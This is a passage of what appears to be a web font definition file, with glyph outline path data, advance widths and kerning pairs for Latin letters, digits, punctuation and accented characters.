-15,-9,-24,-24,-24v-14,0,-23,10,-23,24v0,15,8,25,24,25","w":135},{"d":"144,-279v-3,8,-28,10,-30,2v19,-19,27,-50,62,-53v9,-1,20,4,12,10xm135,-256v79,0,111,48,110,127v0,81,-36,133,-115,133v-79,0,-111,-49,-111,-129v0,-79,35,-131,116,-131xm132,-25v58,0,78,-43,78,-102v0,-58,-19,-101,-77,-101v-59,0,-78,43,-78,101v0,60,18,102,77,102","w":264,"k":{".":6,",":9,"z":2,"x":2,"Z":7,"\u00dd":11,"Y":11,"X":12,"W":4,"V":5,"T":11,"J":5,"\u00c6":6,"\u00c5":4,"\u00c4":4,"\u00c3":4,"\u00c2":4,"\u00c1":4,"\u00c0":4,"A":4}},{"d":"93,-317v14,0,19,4,19,18v0,14,-5,19,-19,20v-14,0,-19,-5,-19,-19v0,-14,5,-19,19,-19xm173,-317v14,0,19,4,19,18v0,14,-5,19,-19,20v-14,0,-19,-5,-19,-19v1,-13,5,-19,19,-19xm135,-256v79,0,111,48,110,127v0,81,-36,133,-115,133v-79,0,-111,-49,-111,-129v0,-79,35,-131,116,-131xm132,-25v58,0,78,-43,78,-102v0,-58,-19,-101,-77,-101v-59,0,-78,43,-78,101v0,60,18,102,77,102","w":264,"k":{".":6,",":9,"z":2,"x":2,"Z":7,"\u00dd":11,"Y":11,"X":12,"W":4,"V":5,"T":11,"J":5,"\u00c6":6,"\u00c5":4,"\u00c4":4,"\u00c3":4,"\u00c2":4,"\u00c1":4,"\u00c0":4,"A":4}},{"d":"163,-186v20,-5,39,6,25,25r-28,0r-8,65v20,-6,41,9,23,25r-26,0v-4,23,-4,51,-11,71v-8,-1,-24,6,-26,-4r8,-67r-55,0v-4,23,-4,51,-11,71v-9,-1,-23,5,-26,-4r8,-67v-16,1,-35,2,-28,-18v0,-12,21,-5,32,-7r8,-65v-13,-1,-33,6,-30,-12v-4,-20,19,-11,33,-13v5,-21,3,-48,11,-66v5,-3,27,-5,26,4r-8,62r54,0v7,-25,-6,-81,36,-65v1,20,-6,44,-7,65xm77,-161r-8,65r54,0r8,-65r-54,0"},{"d":"51,-137v16,0,20,5,20,23v0,18,-4,23,-21,23v-16,0,-21,-5,-21,-22v0,-18,5,-24,22,-24","w":100},{"d":"177,-154v5,1,8,6,7,13v0,8,-1,13,-7,14r-63,0r0,71v-4,8,-26,8,-29,0r0,-71r-63,0v-8,0,-7,-11,-7,-20v10,-16,48,-3,70,-7r0,-71v3,-9,26,-9,29,0r0,71r63,0xm176,-28v10,1,11,27,0,28r-155,-1v-7,-4,-7,-27,2,-27r153,0"},{"d":"199,-259v76,0,124,33,124,109v0,63,-17,118,-78,118v-22,0,-37,-10,-41,-29v-24,36,-106,44,-101,-24v4,-56,19,-104,73,-104v21,0,33,12,43,25v-4,-16,15,-32,29,-17v-4,37,-23,77,-16,115v40,27,62,-33,61,-83v-2,-59,-36,-84,-97,-84v-95,1,-126,65,-133,156v-7,99,98,111,176,89v4,3,3,17,1,22v-16,11,-45,13,-74,13v-86,1,-133,-38,-133,-121v0,-111,52,-185,166,-185xm133,-88v0,53,54,21,68,1r9,-51v-9,-13,-15,-25,-33,-25v-35,0,-44,39,-44,75","w":357},{"d":"151,-46v19,25,-17,49,-45,49v19,24,18,73,-25,68v-13,-2,-35,4,-33,-14v-5,-26,58,9,39,-35r-10,-20v-41,-8,-60,-42,-59,-93v0,-60,25,-98,82,-98v28,0,54,6,55,34v0,8,0,14,-6,14v-14,-8,-26,-22,-50,-21v-35,1,-48,31,-48,70v1,38,11,68,49,68v23,0,36,-15,51,-22","w":169,"k":{"\u00f8":3,"\u00f6":3,"\u00f5":3,"\u00f4":3,"\u00f3":3,"\u00f2":3,"o":3,"\u00e6":3,"\u00e5":3,"\u00e4":3,"\u00e3":3,"\u00e2":3,"\u00e1":3,"\u00e0":3,"a":3}},{"d":"141,-180v3,-11,38,-12,32,5r-86,240v-4,6,-31,10,-36,1v6,-23,17,-44,25,-66v-28,-56,-48,-119,-69,-181v2,-10,32,-7,35,2r51,141xm56,-256v15,0,17,5,18,18v1,14,-4,19,-18,19v-15,0,-18,-4,-18,-18v0,-14,4,-19,18,-19xm125,-256v15,0,18,4,18,18v0,14,-4,19,-18,19v-15,0,-17,-5,-18,-18v-1,-14,4,-19,18,-19","w":181,"k":{"-":9,".":26,",":29,"z":3,"\u00ff":-2,"\u00fd":-2,"y":-2,"w":-2,"v":-2,"t":-2,"s":4,"q":5,"\u00f8":5,"\u00f6":5,"\u00f5":5,"\u00f4":5,"\u00f3":5,"\u00f2":5,"o":5,"g":5,"f":-2,"\u00eb":5,"\u00ea":5,"\u00e9":5,"\u00e8":5,"e":5,"d":5,"\u00e7":5,"c":5,"\u00e6":6,"\u00e5":6,"\u00e4":6,"\u00e3":6,"\u00e2":6,"\u00e1":6,"\u00e0":6,"a":6}},{"d":"143,-256v38,0,81,3,80,44v0,5,-2,9,-6,8v-20,-10,-41,-25,-74,-24v-59,2,-87,41,-90,101v-4,78,67,122,136,90r0,-74r-58,0v-8,0,-7,-11,-7,-20v1,-4,3,-8,7,-7r80,0v7,-1,12,5,12,13r0,97v-8,28,-49,32,-81,32v-80,0,-124,-47,-124,-128v0,-82,44,-132,125,-132","w":252,"k":{"\u00ff":6,"\u00fd":6,"y":6,"x":3,"w":4,"v":6,"\u00dd":6,"Y":6,"W":2,"V":2,"T":2,"\u00c6":2}},{"d":"277,-28v10,1,9,27,0,28r-121,0v-21,-1,-9,-41,-12,-62r-88,0v-12,20,-20,44,-35,62v-11,2,-38,6,-28,-12r130,-237v41,-10,104,-1,153,-4v9,0,10,28,0,28r-99,0r0,80r85,0v7,-1,7,13,6,20v0,4,-2,8,-6,8r-85,0r0,89r100,0xm144,-89v-2,-44,4,-96,-2,-136r-73,136r75,0","w":305,"k":{"-":5,"\u00ff":9,"\u00fd":9,"y":9,"w":7,"v":9,"t":5,"q":6,"\u00f8":7,"\u00f6":7,"\u00f5":7,"\u00f4":7,"\u00f3":7,"\u00f2":7,"o":7,"f":12,"\u00eb":7,"\u00ea":7,"\u00e9":7,"\u00e8":7,"e":7,"d":6,"\u00e7":5,"c":5,"\u00e6":7,"\u00e5":7,"\u00e4":7,"\u00e3":7,"\u00e2":7,"\u00e1":7,"\u00e0":7,"a":7,"Z":2,"S":4,"Q":6,"\u00d6":6,"\u00d5":6,"\u00d4":6,"\u00d3":6,"\u00d2":6,"O":6,"G":5,"\u00c7":5,"C":5,"\u00c5":4,"\u00c4":4,"\u00c3":4,"\u00c2":4,"\u00c1":4,"\u00c0":4,"A":4}},{"d":"174,-253v16,-1,10,26,6,37r-97,216v-8,1,-37,6,-31,-9r96,-214r-121,0v-11,-1,-11,-29,0,-30r147,0","w":202},{"d":"50,-253v110,-8,182,21,182,123v0,106,-68,140,-182,130v-7,0,-13,-5,-13,-14r0,-103v-18,1,-38,3,-31,-21v0,-13,19,-5,31,-7r0,-94v-1,-9,6,-14,13,-14xm71,-28v83,7,125,-21,125,-101v0,-73,-43,-104,-125,-96r0,80v22,-2,70,-5,46,28r-46,0r0,89","w":249,"k":{".":9,",":11,"Z":4,"\u00dd":8,"Y":8,"X":6,"W":3,"V":5,"T":4,"J":4,"\u00c6":5,"\u00c5":6,"\u00c4":6,"\u00c3":6,"\u00c2":6,"\u00c1":6,"\u00c0":6,"A":6}},{"d":"103,-189v55,0,77,35,77,89v1,9,-7,14,-13,14r-115,0v-8,68,70,74,115,50v7,0,5,16,4,23v-13,12,-40,17,-65,17v-61,0,-88,-35,-88,-96v0,-58,27,-96,85,-97xm147,-110v11,-60,-77,-73,-91,-21v-2,7,-4,14,-4,21r95,0","k":{"z":4,"\u00ff":3,"\u00fd":3,"y":3,"x":6,"w":2,"v":2,"t":2,"f":4}},{"d":"88,-317v14,0,19,4,19,18v0,14,-5,19,-19,20v-14,0,-19,-5,-19,-19v0,-14,5,-19,19,-19xm168,-317v14,0,19,4,19,18v0,14,-5,19,-19,20v-14,0,-19,-5,-19,-19v1,-13,5,-19,19,-19xm190,-248v4,-9,30,-8,34,0r0,155v-1,63,-36,97,-98,97v-61,0,-93,-35,-93,-95r0,-157v4,-8,30,-8,34,0v9,86,-33,223,62,223v95,0,51,-138,61,-223","w":256,"k":{".":7,",":5,"J":8,"\u00c6":7,"\u00c5":9,"\u00c4":9,"\u00c3":9,"\u00c2":9,"\u00c1":9,"\u00c0":9,"A":9}},{"d":"169,-79v17,24,-12,49,-39,49v-2,17,9,40,-20,34v-14,0,-6,-22,-8,-34v-46,-6,-66,-41,-66,-94v0,-54,22,-87,66,-97v-4,-20,1,-45,28,-31r0,31v23,4,48,11,44,38v0,5,-2,9,-6,9v-16,-6,-27,-22,-51,-21v-35,2,-47,29,-47,70v0,41,14,66,50,68v24,1,34,-15,49,-22"},{"d":"145,-297v20,4,7,-26,27,-23v9,1,10,1,11,8v1,24,-14,39,-38,39v-27,0,-33,-20,-56,-22v-20,-2,-5,22,-27,22v-9,0,-11,0,-11,-7v0,-25,14,-40,38,-40v26,0,34,19,56,23xm41,-6v-3,13,-46,10,-32,-6r86,-238v7,-7,39,-7,43,3r87,242v-1,10,-34,8,-36,0r-22,-61r-105,0xm114,-219r-44,126r88,0","w":231,"k":{"-":3,".":-2,",":-3,"?":13,"\u00ff":8,"\u00fd":8,"y":8,"v":7,"t":10,"\u00dd":29,"Y":29,"W":16,"V":17,"\u00dc":6,"\u00db":6,"\u00da":6,"\u00d9":6,"U":6,"T":31,"Q":4,"\u00d6":4,"\u00d5":4,"\u00d4":4,"\u00d3":4,"\u00d2":4,"O":4,"J":-4,"G":3,"\u00c7":3,"C":3}},{"d":"236,-46v17,-5,25,10,15,21r-15,0v6,18,-7,36,-27,22r0,-22v-19,-1,-44,3,-60,-2v-2,-9,-2,-20,2,-26v17,-23,30,-50,48,-72v11,-2,30,-6,37,2r0,77xm209,-105r-39,59r39,0r0,-59xm76,-193v18,3,32,10,32,31v1,42,-70,49,-94,25v0,-6,-1,-15,3,-16v17,7,59,18,61,-9v2,-23,-30,-16,-49,-21v-13,-32,47,-7,45,-36v-2,-34,-48,0,-56,-12v-3,-23,22,-21,42,-25v46,-7,57,57,16,63xm213,-255v5,-9,36,-8,27,5r-182,256v-9,2,-29,2,-21,-9","w":270},{"d":"129,-180v5,-8,33,-10,38,-1v0,5,-2,7,-5,10r-64,64v25,35,54,65,76,102v-2,11,-33,8,-38,0r-74,-97r0,97v0,9,-32,10,-32,0r1,-264v4,-4,31,-7,31,3r0,159","w":181,"k":{"-":15,"u":5,"t":2,"s":4,"q":11,"\u00f8":13,"\u00f6":13,"\u00f5":13,"\u00f4":13,"\u00f3":13,"\u00f2":13,"o":13,"\u00eb":13,"\u00ea":13,"\u00e9":13,"\u00e8":13,"e":13,"d":11,"\u00e7":9,"c":9,"\u00e6":7,"\u00e5":7,"\u00e4":7,"\u00e3":7,"\u00e2":7,"\u00e1":7,"\u00e0":7,"a":7}},{"d":"21,-273v24,3,65,-10,65,13r0,309v-1,23,-40,9,-63,13v-8,0,-6,-19,-2,-23r34,0r0,-288v-19,1,-49,4,-34,-24","w":122},{"d":"16,-256v13,0,18,5,18,18v0,14,-4,19,-18,19v-15,0,-17,-5,-18,-18v-1,-14,4,-19,18,-19xm76,-256v13,0,18,3,18,18v0,14,-4,19,-18,19v-14,0,-17,-4,-17,-18v0,-13,3,-19,17,-19xm30,-181v3,-8,29,-8,32,0r0,176v0,9,-32,10,-32,0r0,-176","w":91,"k":{"\u00fe":-3,"l":-3,"k":-3,"h":-3,"b":-3}},{"d":"51,-44v16,0,20,5,20,23v0,18,-4,23,-21,23v-17,0,-21,-6,-21,-23v0,-18,5,-23,22,-23","w":100,"k":{"-":22,"z":-2,"\u00ff":15,"\u00fd":15,"y":15,"w":13,"v":15,"t":9,"g":-4,"f":8,"\u00dd":37,"Y":37,"W":28,"V":29,"\u00dc":4,"\u00db":4,"\u00da":4,"\u00d9":4,"U":4,"T":30,"Q":4,"\u00d6":4,"\u00d5":4,"\u00d4":4,"\u00d3":4,"\u00d2":4,"O":4,"J":-4,"G":7,"\u00c7":7,"C":7,"\u00c5":-2,"\u00c4":-2,"\u00c3":-2,"\u00c2":-2,"\u00c1":-2,"\u00c0":-2,"A":-2}},{"d":"44,-256v15,0,17,5,18,18v1,14,-4,19,-18,19v-15,0,-18,-4,-18,-18v0,-14,4,-19,18,-19xm113,-256v15,0,18,4,18,18v0,14,-4,19,-18,19v-15,0,-17,-5,-18,-18v-1,-14,4,-19,18,-19","w":157},{"d":"162,-297v19,3,6,-26,26,-23v9,1,11,0,12,8v1,24,-15,39,-39,39v-27,0,-33,-19,-55,-22v-20,-3,-6,22,-27,22v-10,0,-10,0,-12,-7v1,-25,14,-40,39,-40v26,0,34,19,56,23xm135,-256v79,0,111,48,110,127v0,81,-36,133,-115,133v-79,0,-111,-49,-111,-129v0,-79,35,-131,116,-131xm132,-25v58,0,78,-43,78,-102v0,-58,-19,-101,-77,-101v-59,0,-78,43,-78,101v0,60,18,102,77,102","w":264,"k":{".":6,",":9,"z":2,"x":2,"Z":7,"\u00dd":11,"Y":11,"X":12,"W":4,"V":5,"T":11,"J":5,"\u00c6":6,"\u00c5":4,"\u00c4":4,"\u00c3":4,"\u00c2":4,"\u00c1":4,"\u00c0":4,"A":4}},{"d":"194,-95v2,70,-49,112,-119,95v-7,15,-13,40,-39,30v0,-15,12,-27,16,-40v-23,-15,-33,-44,-34,-81v-3,-72,46,-109,119,-95v7,-15,13,-40,39,-30v-1,14,-12,27,-16,40v23,15,34,43,34,81xm87,-25v70,24,96,-72,58,-122xm125,-161v-69,-25,-97,72,-59,122","w":211,"k":{",":7,"z":5,"\u00ff":2,"\u00fd":2,"y":2,"x":8,"w":2,"v":2}},{"d":"150,-211v-26,-17,-94,-33,-96,18v12,66,112,39,115,122v3,77,-100,92,-151,55v-4,-5,-7,-24,-1,-30v24,4,36,24,68,21v45,6,66,-51,31,-74v-37,-25,-92,-31,-96,-91v-4,-67,98,-86,134,-45v0,9,4,24,-4,24","w":183,"k":{"-":2,"\u00ff":5,"\u00fd":5,"y":5,"w":3,"v":4,"\u00dd":4,"Y":4,"X":3,"W":3,"V":3,"T":3,"J":2,"\u00c6":1,"\u00c5":3,"\u00c4":3,"\u00c3":3,"\u00c2":3,"\u00c1":3,"\u00c0":3,"A":3}},{"d":"27,-173v-10,-1,-10,-31,-3,-33r161,83v1,10,3,22,-4,26r-157,79v-7,-3,-6,-30,2,-33r126,-62"},{"d":"107,-189v59,0,86,35,86,94v0,61,-30,99,-89,99v-58,0,-87,-35,-86,-95v0,-61,29,-97,89,-98xm105,-23v38,0,54,-29,54,-70v1,-41,-13,-69,-53,-69v-41,0,-55,30,-55,69v0,40,14,70,54,70xm58,-265v-5,-8,3,-9,13,-9v33,0,33,38,50,56v-2,8,-26,6,-28,-1","w":210,"k":{",":7,"z":5,"\u00ff":2,"\u00fd":2,"y":2,"x":8,"w":2,"v":2}},{"d":"104,-311v-15,13,-35,52,-64,34v22,-18,44,-68,83,-47v14,16,31,30,44,48v-31,15,-49,-20,-63,-35xm167,-28v10,0,10,27,0,28r-121,0v-7,0,-13,-5,-12,-14r0,-225v-1,-9,5,-14,12,-14r120,0v10,2,10,28,0,28r-99,0r0,79r85,0v10,2,10,27,0,28r-85,0r0,90r100,0","w":195,"k":{"-":5,"\u00ff":9,"\u00fd":9,"y":9,"w":7,"v":9,"t":5,"q":6,"\u00f8":7,"\u00f6":7,"\u00f5":7,"\u00f4":7,"\u00f3":7,"\u00f2":7,"o":7,"f":12,"\u00eb":7,"\u00ea":7,"\u00e9":7,"\u00e8":7,"e":7,"d":6,"\u00e7":5,"c":5,"\u00e6":7,"\u00e5":7,"\u00e4":7,"\u00e3":7,"\u00e2":7,"\u00e1":7,"\u00e0":7,"a":7,"Z":2,"S":4,"Q":6,"\u00d6":6,"\u00d5":6,"\u00d4":6,"\u00d3":6,"\u00d2":6,"O":6,"G":5,"\u00c7":5,"C":5,"\u00c5":4,"\u00c4":4,"\u00c3":4,"\u00c2":4,"\u00c1":4,"\u00c0":4,"A":4}},{"d":"97,-254r-30,40v-11,2,-31,2,-20,-10v16,-19,30,-65,68,-45v11,18,27,34,35,53v-31,13,-39,-24,-53,-38xm93,-189v47,-1,69,19,69,66r0,118v0,9,-13,6,-22,6v-9,0,-4,-15,-5,-23v-27,38,-120,36,-117,-28v2,-54,54,-60,112,-58v2,-34,-6,-55,-40,-55v-24,0,-41,11,-57,18v-8,0,-6,-11,-6,-20v11,-17,38,-24,66,-24xm84,-21v22,0,33,-12,46,-27r0,-37v-38,0,-79,-3,-79,34v0,19,15,30,33,30","w":191,"k":{"\u00ff":7,"\u00fd":7,"y":7,"x":4,"w":3,"v":7,"t":4,"f":2}},{"d":"59,-155v13,-23,42,-45,72,-28v3,8,4,25,-3,29v-33,-15,-53,10,-66,33r0,116v0,9,-32,10,-32,0r0,-178v6,-5,27,-6,29,2r0,26","w":139,"k":{"-":12,".":40,",":34,"\u00ff":-2,"\u00fd":-2,"y":-2,"w":-2,"v":-4,"s":7,"q":5,"\u00f8":6,"\u00f6":6,"\u00f5":6,"\u00f4":6,"\u00f3":6,"\u00f2":6,"o":6,"g":5,"\u00eb":5,"\u00ea":5,"\u00e9":5,"\u00e8":5,"e":5,"d":5,"\u00e7":6,"c":6,"\u00e6":8,"\u00e5":8,"\u00e4":8,"\u00e3":8,"\u00e2":8,"\u00e1":8,"\u00e0":8,"a":8}},{"d":"129,-311v-16,14,-34,52,-65,34v21,-18,44,-68,83,-47v14,16,31,30,44,48v1,4,-6,3,-11,4v-28,0,-35,-25,-51,-39xm190,-248v4,-9,30,-8,34,0r0,155v-1,63,-36,97,-98,97v-61,0,-93,-35,-93,-95r0,-157v4,-8,30,-8,34,0v9,86,-33,223,62,223v95,0,51,-138,61,-223","w":256,"k":{".":7,",":5,"J":8,"\u00c6":7,"\u00c5":9,"\u00c4":9,"\u00c3":9,"\u00c2":9,"\u00c1":9,"\u00c0":9,"A":9}},{"d":"34,-239v-1,-9,5,-14,12,-14r116,1v6,3,7,27,-2,28r-93,0r0,86r90,0v6,3,6,28,-2,28r-88,0v-2,35,5,81,-3,110v-10,-1,-30,5,-30,-5r0,-234","w":183,"k":{"\/":13,".":38,",":40,"s":7,"q":4,"\u00f8":5,"\u00f6":5,"\u00f5":5,"\u00f4":5,"\u00f3":5,"\u00f2":5,"o":5,"\u00ef":-5,"\u00ee":-4,"\u00eb":6,"\u00ea":6,"\u00e9":6,"\u00e8":6,"e":6,"d":4,"\u00e7":5,"c":5,"\u00e6":11,"\u00e5":11,"\u00e4":11,"\u00e3":11,"\u00e2":11,"\u00e1":11,"\u00e0":11,"a":11,"Z":2,"X":4,"S":6,"Q":4,"\u00d6":4,"\u00d5":4,"\u00d4":4,"\u00d3":4,"\u00d2":4,"O":4,"J":21,"G":4,"\u00c7":4,"C":4,"\u00c6":19,"\u00c5":22,"\u00c4":22,"\u00c3":22,"\u00c2":22,"\u00c1":22,"\u00c0":22,"A":22}},{"d":"157,-297v20,4,7,-26,27,-23v9,1,10,1,12,8v0,23,-15,39,-39,39v-27,0,-33,-20,-56,-22v-19,-3,-4,22,-27,22v-9,0,-11,0,-11,-7v0,-25,14,-40,39,-40v26,0,33,19,55,23xm193,-247v2,-10,31,-9,32,0r0,233v0,22,-44,19,-48,2r-112,-203r0,210v1,9,-19,6,-28,5v-2,0,-4,-3,-3,-5r0,-233v-2,-21,32,-17,46,-11v41,64,77,136,113,203r0,-201","w":258},{"d":"73,-324v37,-21,59,28,77,47v-2,8,-28,5,-30,-2xm135,-256v79,0,111,48,110,127v0,81,-36,133,-115,133v-79,0,-111,-49,-111,-129v0,-79,35,-131,116,-131xm132,-25v58,0,78,-43,78,-102v0,-58,-19,-101,-77,-101v-59,0,-78,43,-78,101v0,60,18,102,77,102","w":264,"k":{".":6,",":9,"z":2,"x":2,"Z":7,"\u00dd":11,"Y":11,"X":12,"W":4,"V":5,"T":11,"J":5,"\u00c6":6,"\u00c5":4,"\u00c4":4,"\u00c3":4,"\u00c2":4,"\u00c1":4,"\u00c0":4,"A":4}},{"d":"7,-254v2,-30,42,-45,66,-37r0,147v-2,6,-25,6,-28,0r0,-123v-12,4,-27,23,-38,13","w":98,"k":{"\/":54}},{"d":"84,-278v2,-8,28,-9,30,0r0,132v-4,6,-28,7,-30,-2r0,-130xm84,-61v1,-10,25,-7,30,-3r0,137v-5,4,-29,7,-30,-3r0,-131"},{"d":"148,-181v2,-9,30,-8,32,0r0,179v-4,4,-29,6,-29,-3r0,-23v-16,18,-32,31,-59,32v-84,4,-61,-110,-62,-187v5,-6,30,-6,31,2v6,58,-21,157,37,157v23,0,36,-17,50,-34r0,-123","w":210},{"d":"10,-317v14,0,19,4,19,18v0,14,-5,19,-19,20v-14,0,-19,-5,-19,-19v0,-14,5,-19,19,-19xm91,-317v14,0,19,4,19,18v0,14,-5,19,-19,20v-14,0,-19,-5,-19,-19v0,-14,5,-19,19,-19xm34,-248v1,-8,30,-8,33,0r0,243v-1,10,-20,6,-30,5v-2,0,-4,-3,-3,-5r0,-243","w":100},{"d":"95,-273v21,-4,41,13,27,32v-34,-18,-60,7,-51,55v16,4,48,-11,45,14v3,24,-29,9,-45,13r0,154v-1,9,-30,10,-33,0r0,-154v-22,6,-42,-9,-25,-27r25,0v-2,-50,8,-88,57,-87","w":122,"k":{"\u00ae":-4,")":-6,"-":11,".":27,",":25,"z":4,"\u00ff":-2,"\u00fd":-2,"y":-2,"w":-1,"v":-3,"s":5,"q":10,"\u00f8":8,"\u00f6":8,"\u00f5":8,"\u00f4":8,"\u00f3":8,"\u00f2":8,"o":8,"g":12,"f":4,"\u00eb":10,"\u00ea":10,"\u00e9":10,"\u00e8":10,"e":10,"d":10,"\u00e7":9,"c":9,"\u00e6":8,"\u00e5":8,"\u00e4":8,"\u00e3":8,"\u00e2":8,"\u00e1":8,"\u00e0":8,"a":8}},{"d":"119,-279v-3,8,-28,10,-30,2v19,-19,27,-50,62,-53v9,-1,20,4,12,10xm167,-28v10,0,10,27,0,28r-121,0v-7,0,-13,-5,-12,-14r0,-225v-1,-9,5,-14,12,-14r120,0v10,2,10,28,0,28r-99,0r0,79r85,0v10,2,10,27,0,28r-85,0r0,90r100,0","w":195,"k":{"-":5,"\u00ff":9,"\u00fd":9,"y":9,"w":7,"v":9,"t":5,"q":6,"\u00f8":7,"\u00f6":7,"\u00f5":7,"\u00f4":7,"\u00f3":7,"\u00f2":7,"o":7,"f":12,"\u00eb":7,"\u00ea":7,"\u00e9":7,"\u00e8":7,"e":7,"d":6,"\u00e7":5,"c":5,"\u00e6":7,"\u00e5":7,"\u00e4":7,"\u00e3":7,"\u00e2":7,"\u00e1":7,"\u00e0":7,"a":7,"Z":2,"S":4,"Q":6,"\u00d6":6,"\u00d5":6,"\u00d4":6,"\u00d3":6,"\u00d2":6,"O":6,"G":5,"\u00c7":5,"C":5,"\u00c5":4,"\u00c4":4,"\u00c3":4,"\u00c2":4,"\u00c1":4,"\u00c0":4,"A":4}},{"d":"93,-189v47,-1,69,19,69,66r0,118v0,9,-13,6,-22,6v-9,0,-4,-15,-5,-23v-27,38,-120,36,-117,-28v2,-54,54,-60,112,-58v2,-34,-6,-55,-40,-55v-24,0,-41,11,-57,18v-8,0,-6,-11,-6,-20v11,-17,38,-24,66,-24xm84,-21v22,0,33,-12,46,-27r0,-37v-38,0,-79,-3,-79,34v0,19,15,30,33,30xm109,-219v-3,7,-26,9,-28,1v18,-20,19,-61,59,-55v5,0,8,5,4,8","w":191,"k":{"\u00ff":7,"\u00fd":7,"y":7,"x":4,"w":3,"v":7,"t":4,"f":2}},{"d":"134,-311v-15,13,-35,52,-64,34v22,-18,44,-68,83,-47v14,16,31,30,44,48v-31,15,-49,-20,-63,-35xm135,-256v79,0,111,48,110,127v0,81,-36,133,-115,133v-79,0,-111,-49,-111,-129v0,-79,35,-131,116,-131xm132,-25v58,0,78,-43,78,-102v0,-58,-19,-101,-77,-101v-59,0,-78,43,-78,101v0,60,18,102,77,102","w":264,"k":{".":6,",":9,"z":2,"x":2,"Z":7,"\u00dd":11,"Y":11,"X":12,"W":4,"V":5,"T":11,"J":5,"\u00c6":6,"\u00c5":4,"\u00c4":4,"\u00c3":4,"\u00c2":4,"\u00c1":4,"\u00c0":4,"A":4}},{"d":"193,-247v2,-10,31,-9,32,0r0,233v0,22,-44,19,-48,2r-112,-203r0,210v1,9,-19,6,-28,5v-2,0,-4,-3,-3,-5r0,-233v-2,-21,32,-17,46,-11v41,64,77,136,113,203r0,-201","w":258},{"d":"118,-311v-16,14,-34,52,-65,34v22,-18,44,-68,84,-47v14,16,31,30,43,48v1,4,-6,3,-11,4v-28,0,-35,-25,-51,-39xm41,-6v-3,13,-46,10,-32,-6r86,-238v7,-7,39,-7,43,3r87,242v-1,10,-34,8,-36,0r-22,-61r-105,0xm114,-219r-44,126r88,0","w":231,"k":{"-":3,".":-2,",":-3,"?":13,"\u00ff":8,"\u00fd":8,"y":8,"v":7,"t":10,"\u00dd":29,"Y":29,"W":16,"V":17,"\u00dc":6,"\u00db":6,"\u00da":6,"\u00d9":6,"U":6,"T":31,"Q":4,"\u00d6":4,"\u00d5":4,"\u00d4":4,"\u00d3":4,"\u00d2":4,"O":4,"J":-4,"G":3,"\u00c7":3,"C":3}},{"d":"167,-28v10,0,10,27,0,28r-121,0v-7,0,-13,-5,-12,-14r0,-225v-1,-9,5,-14,12,-14r120,0v10,2,10,28,0,28r-99,0r0,79r85,0v10,2,10,27,0,28r-85,0r0,90r100,0","w":195,"k":{"-":5,"\u00ff":9,"\u00fd":9,"y":9,"w":7,"v":9,"t":5,"q":6,"\u00f8":7,"\u00f6":7,"\u00f5":7,"\u00f4":7,"\u00f3":7,"\u00f2":7,"o":7,"f":12,"\u00eb":7,"\u00ea":7,"\u00e9":7,"\u00e8":7,"e":7,"d":6,"\u00e7":5,"c":5,"\u00e6":7,"\u00e5":7,"\u00e4":7,"\u00e3":7,"\u00e2":7,"\u00e1":7,"\u00e0":7,"a":7,"Z":2,"S":4,"Q":6,"\u00d6":6,"\u00d5":6,"\u00d4":6,"\u00d3":6,"\u00d2":6,"O":6,"G":5,"\u00c7":5,"C":5,"\u00c5":4,"\u00c4":4,"\u00c3":4,"\u00c2":4,"\u00c1":4,"\u00c0":4,"A":4}},{"d":"187,-186v0,37,-22,53,-49,63v38,23,48,75,64,121v-7,5,-35,7,-36,-5v-25,-44,-20,-116,-99,-106v-2,36,5,83,-3,113v-10,-1,-30,5,-30,-5r0,-234v5,-29,60,-9,93,-12v36,6,59,25,60,65xm67,-140v45,2,85,-1,85,-43v0,-42,-41,-44,-85,-42r0,85","w":217,"k":{".":-2,"\u00ff":6,"\u00fd":6,"y":6,"w":6,"v":5,"\u00f8":8,"\u00f6":8,"\u00f5":8,"\u00f4":8,"\u00f3":8,"\u00f2":8,"o":8,"\u00eb":7,"\u00ea":7,"\u00e9":7,"\u00e8":7,"e":7,"\u00dd":6,"Y":6,"W":4,"V":5,"T":4,"S":5,"Q":4,"\u00d6":4,"\u00d5":4,"\u00d4":4,"\u00d3":4,"\u00d2":4,"O":4,"G":4,"\u00c7":4,"C":4}},{"d":"310,-247v3,-12,43,-11,33,6r-70,238v-7,6,-41,8,-44,-4r-53,-191r-49,191v-2,12,-43,13,-47,0r-68,-241v1,-10,32,-9,35,1r57,212r54,-211v2,-11,35,-12,38,0r58,211","w":355,"k":{"-":17,".":40,";":30,",":42,"\u00ff":10,"\u00fd":10,"y":10,"v":7,"\u00fc":12,"\u00fb":12,"\u00fa":12,"\u00f9":12,"u":12,"s":14,"r":12,"q":14,"p":12,"\u00f8":17,"\u00f6":17,"\u00f5":17,"\u00f4":17,"\u00f3":17,"\u00f2":17,"o":17,"\u00f1":12,"n":12,"m":12,"\u00ef":-9,"\u00ee":-8,"\u00ec":-3,"g":11,"\u00eb":15,"\u00ea":15,"\u00e9":15,"\u00e8":15,"e":15,"d":14,"\u00e7":15,"c":15,"\u00e6":14,"\u00e5":14,"\u00e4":14,"\u00e3":14,"\u00e2":14,"\u00e1":14,"\u00e0":14,"a":14,"X":3,"S":2,"Q":4,"\u00d6":4,"\u00d5":4,"\u00d4":4,"\u00d3":4,"\u00d2":4,"O":4,"J":17,"G":4,"\u00c7":4,"C":4,"\u00c6":24,"\u00c5":18,"\u00c4":18,"\u00c3":18,"\u00c2":18,"\u00c1":18,"\u00c0":18,"A":18}},{"d":"-10,-324v37,-22,60,27,77,47v-2,9,-27,5,-30,-2xm34,-248v1,-8,30,-8,33,0r0,243v-1,10,-20,6,-30,5v-2,0,-4,-3,-3,-5r0,-243","w":100},{"d":"34,-248v1,-8,30,-8,33,0r0,243v-1,10,-20,6,-30,5v-2,0,-4,-3,-3,-5r0,-243","w":100},{"d":"159,-191v10,-6,24,8,20,20r-60,59r61,61v0,12,-12,23,-21,18r-60,-60v-22,20,-40,44,-64,62v-8,-2,-20,-13,-14,-22r59,-59v-20,-22,-43,-40,-61,-64v1,-9,12,-21,22,-15r59,59"},{"d":"148,-181v2,-9,30,-8,32,0r0,179v-4,4,-29,6,-29,-3r0,-23v-16,18,-32,31,-59,32v-84,4,-61,-110,-62,-187v5,-6,30,-6,31,2v6,58,-21,157,37,157v23,0,36,-17,50,-34r0,-123xm71,-256v15,0,17,5,18,18v1,14,-4,19,-18,19v-15,0,-18,-4,-18,-18v0,-14,4,-19,18,-19xm140,-256v15,0,18,4,18,18v0,14,-4,19,-18,19v-15,0,-17,-5,-18,-18v-1,-14,4,-19,18,-19","w":210},{"d":"46,-254v-14,14,-21,51,-52,38v12,-21,32,-73,70,-53v11,18,27,34,35,53v-31,13,-39,-24,-53,-38xm30,